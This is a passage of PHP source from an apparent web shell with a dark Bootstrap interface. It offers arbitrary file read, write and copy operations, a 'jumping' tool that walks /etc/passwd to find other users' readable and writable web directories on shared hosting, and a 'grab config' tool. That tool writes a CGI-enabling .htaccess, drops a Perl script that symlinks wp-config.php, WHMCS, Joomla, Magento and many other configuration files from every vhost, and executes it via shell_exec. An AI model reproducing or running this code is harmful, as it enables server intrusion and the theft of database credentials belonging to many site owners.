bg-secondary ms-1">N/A</span> </div> </div> <div class="mt-1"> <small class="text-muted"> <i class="bi bi-folder me-1"></i>'.$path.' (Not accessible) </small> </div> </div>'; } } echo '</div>'; // Directory stats $accessible_count = 0; foreach($common_dirs as $path => $dir_info) { if(is_dir($path) && is_readable($path)) { $accessible_count++; } } echo '<div class="mt-3"> <div class="row text-center"> <div class="col-6"> <div class="card bg-dark border-secondary"> <div class="card-body p-2"> <h6 class="mb-0">'.$accessible_count.'</h6> <small>Accessible</small> </div> </div> </div> <div class="col-6"> <div class="card bg-dark border-secondary"> <div class="card-body p-2"> <h6 class="mb-0">'.(count($common_dirs) - $accessible_count).'</h6> <small>Inaccessible</small> </div> </div> </div> </div> </div>'; echo '</div></div></div></div></div></div>'; // JavaScript untuk filter directories echo '<script> function filterDirectories() { var input = document.getElementById("searchDirs"); var filter = input.value.toLowerCase(); var items = document.getElementsByClassName("dir-item"); for (var i = 0; i < items.length; i++) { var item = items[i]; var text = item.textContent || item.innerText; if (text.toLowerCase().indexOf(filter) > -1) { item.style.display = ""; } else { item.style.display = "none"; } } } </script>'; } // Tab File Operations (dipindahkan dari Archive Tools) elseif($_GET['do'] == 'fileops') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-files me-2"></i>File Operations</h5> </div> <div class="card-body">'; echo '<div class="row g-4">'; // File Operations echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-primary"> <i class="bi bi-files me-2"></i>File Operations </div> <div class="card-body"> <form method="post"> <div class="mb-3"> <label class="form-label">Source File:</label> <input type="text" name="source_file" class="form-control bg-dark text-light" placeholder="/path/to/source/file" required> </div> <div class="mb-3"> <label class="form-label">Destination File:</label> <input type="text" name="dest_file" class="form-control bg-dark text-light" placeholder="/path/to/destination/file" required> </div> <div class="mb-3"> <label class="form-label">Operation:</label> <select name="file_op" class="form-select bg-dark text-light"> <option value="copy">Copy File</option> <option value="read">Read File Content</option> <option value="write">Write to File</option> <option value="highlight">Highlight File (PHP/HTML/JS)</option> </select> </div> <div class="mb-3" id="write_content" style="display:none;"> <label class="form-label">Content to Write:</label> <textarea name="file_content" class="form-control bg-dark text-light" rows="3" placeholder="Enter content to write"></textarea> </div> <button type="submit" name="do_file_op" class="btn btn-primary w-100"> <i class="bi bi-play-fill me-2"></i>Execute Operation </button> </form>'; if(isset($_POST['do_file_op'])) { $source = $_POST['source_file']; $dest = $_POST['dest_file']; $operation = $_POST['file_op']; echo '<div class="mt-3">'; switch($operation) { case 'copy': if(copyFile($source, $dest)) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> File copied successfully from <code>'.$source.'</code> to <code>'.$dest.'</code> </div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Failed to copy file </div>'; } break; case 'read': $content = readFileContent($source); if($content !== false) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> File content read successfully<br> <pre class="mt-2 p-2 bg-dark text-light rounded" style="max-height: 300px; overflow: auto;">' .htmlspecialchars(substr($content, 0, 5000)).'</pre> </div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Cannot read file or file not found </div>'; } break; case 'write': $content = $_POST['file_content'] ?? ''; if(writeFile($dest, $content)) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> File written successfully to <code>'.$dest.'</code> </div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Failed to write file </div>'; } break; case 'highlight': $highlighted = highlightFileContent($source); if($highlighted !== false) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> File highlighted successfully </div> <div class="mt-2">'.$highlighted.'</div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Cannot highlight file </div>'; } break; } echo '</div>'; } echo '<script> document.querySelector("select[name=\'file_op\']").addEventListener("change", function() { var writeDiv = document.getElementById("write_content"); if(this.value == "write") { writeDiv.style.display = "block"; } else { writeDiv.style.display = "none"; } }); </script>'; echo '</div></div></div>'; // Quick File Tools echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-info"> <i class="bi bi-tools me-2"></i>Quick File Tools </div> <div class="card-body"> <div class="d-grid gap-2"> <a href="?act=newfile&dir='.$dir.'" class="btn btn-outline-success"> <i class="bi bi-file-earmark-plus me-2"></i>Create New File </a> <a href="?act=newfolder&dir='.$dir.'" class="btn btn-outline-primary"> <i class="bi bi-folder-plus me-2"></i>Create New Folder </a> <button type="button" class="btn btn-outline-warning" data-bs-toggle="modal" data-bs-target="#findFilesModal"> <i class="bi bi-search me-2"></i>Find Files by Extension </button> <button type="button" class="btn btn-outline-info" data-bs-toggle="modal" data-bs-target="#findTextModal"> <i class="bi bi-file-text me-2"></i>Find Text in Files </button> </div> <div class="mt-3"> <h6><i class="bi bi-info-circle me-2"></i>File Functions Status:</h6> <table class="table table-dark table-sm"> <tr> <td>file_get_contents:</td> <td>'.(function_exists('file_get_contents') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-danger">Not Available</span>').'</td> </tr> <tr> <td>fopen/fread:</td> <td>'.(function_exists('fopen') && function_exists('fread') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-danger">Not Available</span>').'</td> </tr> <tr> <td>highlight_file:</td> <td>'.(function_exists('highlight_file') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-danger">Not Available</span>').'</td> </tr> </table> </div> </div> </div> </div>'; echo '</div></div></div>'; // Modals untuk find files echo ' <!-- Find Files Modal --> <div class="modal fade" id="findFilesModal" tabindex="-1" aria-labelledby="findFilesModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content bg-dark"> <div class="modal-header"> <h5 class="modal-title" id="findFilesModalLabel">Find Files by Extension</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body"> <form method="post" action="?do=scan"> <div class="mb-3"> <label class="form-label">Directory to Scan:</label> <input type="text" name="scan_dir" class="form-control bg-dark text-light" value="'.$dir.'" required> </div> <div class="mb-3"> <label class="form-label">File Extensions (comma separated):</label> <input type="text" name="scan_ext" class="form-control bg-dark text-light" placeholder="php,html,js,css,txt" value="php,html,js"> </div> <button type="submit" class="btn btn-primary w-100"> <i class="bi bi-search me-2"></i>Find Files </button> </form> </div> </div> </div> </div> <!-- Find Text Modal --> <div class="modal fade" id="findTextModal" tabindex="-1" aria-labelledby="findTextModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content bg-dark"> <div class="modal-header"> <h5 class="modal-title" id="findTextModalLabel">Find Text in Files</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body"> <form method="post"> <div class="mb-3"> <label class="form-label">Directory to Scan:</label> <input type="text" name="text_dir" class="form-control bg-dark text-light" value="'.$dir.'" required> </div> <div class="mb-3"> <label class="form-label">Text to Search:</label> <input type="text" name="search_text" class="form-control bg-dark text-light" placeholder="password, database, config" required> </div> <div class="mb-3"> <label class="form-label">File Extensions:</label> <input type="text" name="text_ext" class="form-control bg-dark text-light" placeholder="php,txt,conf,config" value="php,txt,conf"> </div> <button type="submit" name="do_text_search" class="btn btn-primary w-100"> <i class="bi bi-search me-2"></i>Search Text </button> </form> </div> </div> </div> </div>'; } // Tab Jumping - DIPERBAIKI elseif($_GET['do'] == 'jumping') { $i = 0; echo "<div class='card mb-4'>"; // Check for HSphere if(preg_match("/hsphere/", $dir)) { echo '<div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-hdd-rack me-2"></i>HSphere Jumping</h5> </div> <div class="card-body">'; $urls = explode("\r\n", $_POST['url'] ?? ''); if(isset($_POST['jump'])) { echo "<div class='alert alert-info'> <i class='bi bi-search me-2'></i> <strong>Searching in HSphere...</strong> </div> <div class='table-responsive'> <table class='table table-dark table-sm'> <thead> <tr> <th>Status</th> <th>Path</th> <th>Actions</th> </tr> </thead> <tbody>"; foreach($urls as $url) { if(empty(trim($url))) continue; $url = str_replace(array("http://","www."), "", strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc,"r"); if($f) { while($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if(is_dir($dir_user) === true) { $url_user = $dir_user."/".$url; if(is_readable($url_user)) { $i++; $status = is_writable($url_user) ? '<span class="badge bg-success">RW</span>' : '<span class="badge bg-warning">R</span>'; echo "<tr> <td>{$status}</td> <td> <code>{$url_user}</code> </td> <td> <a href='?dir=".urlencode($url_user)."' class='btn btn-sm btn-outline-success'> <i class='bi bi-box-arrow-in-right'></i> Open </a> </td> </tr>"; } } } fclose($f); } } echo "</tbody></table></div>"; if($i == 0) { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No accessible directories found </div>'; } else { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Total ada '.$i.' Kamar di '.$server_ip.' </div>'; } } else { // Show domain list from HSphere echo '<center> <form method="post"> <div class="mb-3"> <label class="form-label">List Domains:</label> <textarea name="url" class="form-control bg-dark text-light" style="height: 250px;">'; $sites_file = "/hsphere/local/config/httpd/sites/sites.txt"; if(file_exists($sites_file) && is_readable($sites_file)) { $fp = fopen($sites_file,"r"); if($fp) { while($getss = fgets($fp)) { echo htmlspecialchars($getss); } fclose($fp); } } else { echo "# HSphere sites.txt not found\n"; echo "# Add domains manually, one per line\n"; echo "example1.com\n"; echo "example2.com\n"; echo "example3.com\n"; } echo '</textarea> </div> <button type="submit" name="jump" class="btn btn-primary" style="width: 100%; height: 40px;"> <i class="bi bi-box-arrow-in-right me-2"></i>Jumping </button> </form></center>'; } echo '</div></div>'; } // Check for vHosts elseif(preg_match("/vhosts|vhost/", $dir)) { echo '<div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-server me-2"></i>vHosts Jumping</h5> </div> <div class="card-body">'; preg_match("/\/var\/www\/(.*?)\//", $dir, $vh); $urls = explode("\r\n", $_POST['url'] ?? ''); if(isset($_POST['jump'])) { echo "<div class='alert alert-info'> <i class='bi bi-search me-2'></i> <strong>Searching in vHosts...</strong> </div> <div class='table-responsive'> <table class='table table-dark table-sm'> <thead> <tr> <th>Status</th> <th>Domain</th> <th>Path</th> <th>Actions</th> </tr> </thead> <tbody>"; foreach($urls as $url) { if(empty(trim($url))) continue; $url = str_replace("www.", "", $url); $web_vh = "/var/www/".($vh[1] ?? 'unknown')."/$url/httpdocs"; if(is_dir($web_vh) === true && is_readable($web_vh)) { $i++; $status = is_writable($web_vh) ? '<span class="badge bg-success">RW</span>' : '<span class="badge bg-warning">R</span>'; echo "<tr> <td>{$status}</td> <td><strong>{$url}</strong></td> <td><code>{$web_vh}</code></td> <td> <a href='?dir=".urlencode($web_vh)."' class='btn btn-sm btn-outline-success'> <i class='bi bi-box-arrow-in-right'></i> Open </a> </td> </tr>"; } } echo "</tbody></table></div>"; if($i == 0) { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No accessible vHosts directories found </div>'; } else { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Total ada '.$i.' Kamar di '.$server_ip.' </div>'; } } else { // Show domain list from Bing echo '<center> <form method="post"> <div class="mb-3"> <label class="form-label">List Domains:</label> <textarea name="url" class="form-control bg-dark text-light" style="height: 250px;">'; // Simulate bing search echo bing('ip:"' . $server_ip . '"'); echo '</textarea> </div> <button type="submit" name="jump" class="btn btn-primary" style="width: 100%; height: 40px;"> <i class="bi bi-box-arrow-in-right me-2"></i>Jumping </button> </form></center>'; } echo '</div></div>'; } // Default /etc/passwd scanning else { echo '<div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-people me-2"></i>User Directory Jumping</h5> </div> <div class="card-body">'; echo "<div class='alert alert-info'> <i class='bi bi-search me-2'></i> <strong>Scanning /etc/passwd for user directories...</strong> </div>"; $etc = fopen("/etc/passwd", "r"); if(!$etc) { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Can\'t read /etc/passwd </div>'; } else { echo '<div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th>User</th> <th>Status</th> <th>Directory</th> <th>Domain</th> <th>Actions</th> </tr> </thead> <tbody>'; while($passwd = fgets($etc)) { if(preg_match_all('/(.*?):x:/', $passwd, $user_jumping)) { foreach($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $status = is_writable($user_jumping_dir) ? '<span class="badge bg-success">RW</span>' : '<span class="badge bg-warning">R</span>'; // Try to get domain $domain_info = ""; if(function_exists('posix_getpwuid')) { $domain_jump = @file_get_contents("/etc/named.conf"); if($domain_jump) { preg_match_all("#/var/named/(.*?)\.db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); if($user_jumping_url && $user_jumping_url['name'] == $user_idx_jump) { $domain_info = "<span class='badge bg-info'>{$dj}</span>"; break; } } } if(empty($domain_info)) { $domain_info = '<span class="text-muted">No domain</span>'; } } else { $domain_info = '<span class="text-muted">posix not available</span>'; } echo "<tr> <td><strong>{$user_idx_jump}</strong></td> <td>{$status}</td> <td><code>{$user_jumping_dir}</code></td> <td>{$domain_info}</td> <td> <a href='?dir=".urlencode($user_jumping_dir)."' class='btn btn-sm btn-outline-success'> <i class='bi bi-box-arrow-in-right'></i> Open </a> </td> </tr>"; } } } } fclose($etc); echo "</tbody></table></div>"; if($i == 0) { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No user directories found with public_html </div>'; } else { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Total ada '.$i.' Kamar di '.$server_ip.' </div>'; } } echo '</div></div>'; } echo "</div>"; } // Tab Grab Config - DIPERBAIKI elseif($_GET['do'] == 'grab') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-download me-2"></i>Grab Configuration Files</h5> </div> <div class="card-body">'; // Buat direktori pbm_config $config_dir = $dir . "/pbm_config"; @mkdir($config_dir, 0777, true); // Buat file .htaccess untuk konfigurasi $htaccess_content = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin"; $htaccess_file = $config_dir . "/.htaccess"; @file_put_contents($htaccess_file, $htaccess_content); // Cek jika berada di vhosts if(preg_match("/vhosts|vhost/", $dir)) { echo '<div class="alert alert-info"> <i class="bi bi-info-circle me-2"></i> <strong>vHosts Directory Detected:</strong> '.$dir.' </div>'; $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); // Buat file vhost.cin (Perl script untuk symlink) $vhost_script = '#!/usr/bin/perl -I/usr/local/bandmin opendir(my $dir , "/var/www/vhosts/"); foreach(sort readdir $dir) { my $isDir = 0; $isDir = 1 if -d $_; $sitess = $_; if($isDir && $sitess !~ /^\./) { # Buat symlink untuk berbagai konfigurasi CMS symlink("/var/www/vhosts/$sitess/httpdocs/includes/configure.php", "$sitess-shop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/os/includes/configure.php", "$sitess-shop-os.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscom/includes/configure.php", "$sitess-oscom.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscommerce/includes/configure.php", "$sitess-oscommerce.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscommerces/includes/configure.php", "$sitess-oscommerces.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shop/includes/configure.php", "$sitess-shop2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shopping/includes/configure.php", "$sitess-shop-shopping.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/sale/includes/configure.php", "$sitess-sale.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/amember/config.inc.php", "$sitess-amember.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.inc.php", "$sitess-amember2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/members/configuration.php", "$sitess-members.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.php", "$sitess-4images1.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/includes/config.php", "$sitess-forum.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forums/includes/config.php", "$sitess-forums.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/conf.php", "$sitess-5.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/config.php", "$sitess-4.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wp/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/WP/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/press/wp-config.php", "$sitess-wp13-press.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wordpress/wp-config.php", "$sitess-wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/Wordpress/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blog/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wordpress/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/news/wp-config.php", "$sitess-Wordpress-news.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/new/wp-config.php", "$sitess-Wordpress-new.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blog/wp-config.php", "$sitess-Wordpress-blog.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress-beta.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blogs/wp-config.php", "$sitess-Wordpress-blogs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/home/wp-config.php", "$sitess-Wordpress-home.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/portal/wp-config.php", "$sitess-Wordpress-portal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/site/wp-config.php", "$sitess-Wordpress-site.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/main/wp-config.php", "$sitess-Wordpress-main.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/test/wp-config.php", "$sitess-Wordpress-test.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/arcade/functions/dbclass.php", "$sitess-ibproarcade.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/joomla/configuration.php", "$sitess-joomla2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/portal/configuration.php", "$sitess-joomla-portal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/joo/configuration.php", "$sitess-joo.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cms/configuration.php", "$sitess-joomla-cms.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/site/configuration.php", "$sitess-joomla-site.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/main/configuration.php", "$sitess-joomla-main.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/news/configuration.php", "$sitess-joomla-news.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/new/configuration.php", "$sitess-joomla-new.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/home/configuration.php", "$sitess-joomla-home.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb/includes/config.php", "$sitess-vb~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb3/includes/config.php", "$sitess-vb3~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cc/includes/config.php", "$sitess-vb1~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/includes/class_core.php", "$sitess-vbluttin~class_core.php.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb/includes/class_core.php", "$sitess-vbluttin~class_core.php1.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cc/includes/class_core.php", "$sitess-vbluttin~class_core.php2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/configuration.php", "$sitess-whm15.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/central/configuration.php", "$sitess-whm-central.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/whmcs/configuration.php", "$sitess-whm-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/WHMCS/configuration.php", "$sitess-whm-WHMCS.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whmc/WHM/configuration.php", "$sitess-whmc-WHM.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whmcs/configuration.php", "$sitess-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/support/configuration.php", "$sitess-support.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supp/configuration.php", "$sitess-supp.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/configuration.php", "$sitess-sucure.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/whm/configuration.php", "$sitess-sucure-whm.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/whmcs/configuration.php", "$sitess-sucure-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cpanel/configuration.php", "$sitess-cpanel.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/panel/configuration.php", "$sitess-panel.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/host/configuration.php", "$sitess-host.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosting/configuration.php", "$sitess-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosts/configuration.php", "$sitess-hosts.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/configuration.php", "$sitess-joomla.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/submitticket.php", "$sitess-whmcs2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/clients/configuration.php", "$sitess-clients.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/client/configuration.php", "$sitess-client.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/clientes/configuration.php", "$sitess-clientes.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cliente/configuration.php", "$sitess-cliente.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/clientsupport/configuration.php", "$sitess-clientsupport.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billing/configuration.php", "$sitess-billing.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/manage/configuration.php", "$sitess-whm-manage.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/my/configuration.php", "$sitess-whm-my.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/myshop/configuration.php", "$sitess-whm-myshop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/dist-configure.php", "$sitess-zencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/zencart/includes/dist-configure.php", "$sitess-shop-zencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shop/includes/dist-configure.php", "$sitess-shop-ZCshop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/Settings.php", "$sitess-smf.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/smf/Settings.php", "$sitess-smf2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/Settings.php", "$sitess-smf-forum.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forums/Settings.php", "$sitess-smf-forums.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/upload/includes/config.php", "$sitess-up.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/article/config.php", "$sitess-Nwahy.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/up/includes/config.php", "$sitess-up2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/conf_global.php", "$sitess-6.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/include/db.php", "$sitess-7.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/connect.php", "$sitess-PHP-Fusion.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/mk_conf.php", "$sitess-9.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.php", "$sitess-4images.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/sites/default/settings.php", "$sitess-Drupal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/member/configuration.php", "$sitess-1member.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billings/configuration.php", "$sitess-billings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/configuration.php", "$sitess-whm.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supports/configuration.php", "$sitess-supports.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/requires/config.php", "$sitess-AM4SS-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supports/includes/iso4217.php", "$sitess-hostbills-supports.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/client/includes/iso4217.php", "$sitess-hostbills-client.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/support/includes/iso4217.php", "$sitess-hostbills-support.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billing/includes/iso4217.php", "$sitess-hostbills-billing.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billings/includes/iso4217.php", "$sitess-hostbills-billings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/host/includes/iso4217.php", "$sitess-hostbills-host.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosts/includes/iso4217.php", "$sitess-hostbills-hosts.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosting/includes/iso4217.php", "$sitess-hostbills-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hostings/includes/iso4217.php", "$sitess-hostbills-hostings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/iso4217.php", "$sitess-hostbills.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hostbillincludes/iso4217.php", "$sitess-hostbills-hostbills.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/iso4217.php", "$sitess-hostbills-hostbill.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/app/etc/local.xml", "$sitess-Magento.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/config.php", "$sitess-Opencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config/settings.inc.php", "$sitess-Prestashop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config/koneksi.php", "$sitess-Lokomedia.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/lokomedia/config/koneksi.php", "$sitess-Lokomedia.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/slconfig.php", "$sitess-Sitelok.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/application/config/database.php", "$sitess-Ellislab.txt"); } } print "Location: ./\n\n";'; $vhost_file = $config_dir . "/vhost.cin"; @file_put_contents($vhost_file, $vhost_script); @chmod($vhost_file, 0755); echo '<div class="alert alert-warning"> <i class="bi bi-gear me-2"></i> <strong>vHosts Config Script Created:</strong> vhost.cin<br> <small>This Perl script will create symlinks to configuration files</small> </div>'; echo '<div class="d-grid gap-2"> <a href="?dir='.urlencode($config_dir).'" class="btn btn-success"> <i class="bi bi-folder me-2"></i>Open pbm_config Directory </a>'; // Try to execute the script $output = @shell_exec("cd " . escapeshellarg($config_dir) . " && ./vhost.cin 2>&1"); if($output) { echo '<div class="alert alert-success mt-3"> <i class="bi bi-check-circle me-2"></i> Script executed successfully!<br> <small>Symlinks created in pbm_config directory</small> </div>'; } else { echo '<div class="alert alert-info mt-3"> <i class="bi bi-info-circle me-2"></i> Script ready to run. You can execute it manually from the directory. </div>'; } echo '</div>'; } else { // Jika tidak di vhosts, scan /etc/passwd untuk user echo '<div class="alert alert-info"> <i class="bi bi-people me-2"></i> <strong>Scanning /etc/passwd for user configurations...</strong> </div>'; $etc = @fopen("/etc/passwd", "r"); if(!$etc) { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> <strong>Error:</strong> Cannot read /etc/passwd </div>'; } else { $users_found = 0; $configs_found = 0; // Daftar konfigurasi yang akan di-scan $grab_config = array( // vBulletin "/home/USER/public_html/vb/includes/config.php" => "vBulletin1", "/home/USER/public_html/forum/includes/config.php" => "vBulletin3", "/home/USER/public_html/cc/includes/config.php" => "vBulletin4", "/home/USER/public_html/includes/config.php" => "vBulletin2", // WordPress "/home/USER/public_html/wp-config.php" => "Wordpress1", "/home/USER/public_html/blog/wp-config.php" => "Wordpress2", "/home/USER/public_html/wp/wp-config.php" => "WordPress", "/home/USER/public_html/wordpress/wp-config.php" => "WordPress", // Joomla "/home/USER/public_html/configuration.php" => "Joomla1", "/home/USER/public_html/blog/configuration.php" => "Joomla2", "/home/USER/public_html/joomla/configuration.php" => "Joomla3", "/home/USER/public_html/portal/configuration.php" => "joomla-portal", // WHMCS "/home/USER/public_html/whm/configuration.php" => "Whm1", "/home/USER/public_html/whmc/configuration.php" => "Whm2", "/home/USER/public_html/support/configuration.php" => "Whm3", "/home/USER/public_html/client/configuration.php" => "Whm4", "/home/USER/public_html/billings/configuration.php" => "Whm5", "/home/USER/public_html/billing/configuration.php" => "Whm6", "/home/USER/public_html/clients/configuration.php" => "Whm7", "/home/USER/public_html/whmcs/configuration.php" => "Whm8", "/home/USER/public_html/order/configuration.php" => "Whm9", // Other CMS 